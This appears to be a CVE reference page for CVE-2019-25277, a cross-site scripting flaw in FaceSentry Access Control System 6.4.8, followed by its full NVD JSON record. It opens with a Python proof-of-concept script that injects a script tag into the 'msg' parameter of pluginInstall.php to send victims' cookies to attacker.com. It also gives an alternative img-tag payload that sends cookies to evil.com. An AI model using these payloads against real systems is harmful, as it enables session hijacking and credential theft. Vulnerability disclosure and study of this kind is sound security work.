CVE-2019-25277

import requests # CVE-2019-25277 PoC - FaceSentry XSS in pluginInstall.php # Target: FaceSentry Access Control System 6.4.8 # Vulnerability: XSS in msg parameter of pluginInstall.php target_url = "http://target.com/pluginInstall.php" # XSS payload to steal cookies xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Construct malicious request params = { 'msg': xss_payload, 'install': '1' } try: response = requests.get(target_url, params=params, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Payload: {xss_payload}") if response.status_code == 200: print("[+] PoC executed - XSS payload injected") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Alternative payload - cookie theft via image tag alt_payload = '<img src=x onerror="this.src='https://evil.com/log?c='+document.cookie">'

{"cve": {"id": "CVE-2019-25277", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:57.760", "lastModified": "2026-01-22T13:47:52.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FaceSentry Access Control System 6.4.8 contains a cross-site scripting vulnerability in the 'msg' parameter of pluginInstall.php that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated input to execute arbitrary JavaScript in victim browsers, potentially stealing authentication credentials and conducting phishing attacks."}, {"lang": "es", "value": "El Sistema de Control de Acceso FaceSentry 6.4.8 contiene una vulnerabilidad de cross-site scripting en el parámetro 'msg' de pluginInstall.php que permite a los atacantes inyectar scripts maliciosos. Los atacantes pueden explotar la entrada no validada para ejecutar JavaScript arbitrario en los navegadores de las víctimas, potencialmente robando credenciales de autenticación y realizando ataques de phishing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "C64B12CF-265E-4FD8-9BCF-95843E5A885B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "A6913639-EBF7-4451-9052-71DB2B3DF925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "26BA8B79-F65D-4D30-8827-B893F500BF8C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "EFE14646-6ED5-46DC-8A19-4F2358F784E5"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019070017", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/163191", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/153494", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5527.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5527.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}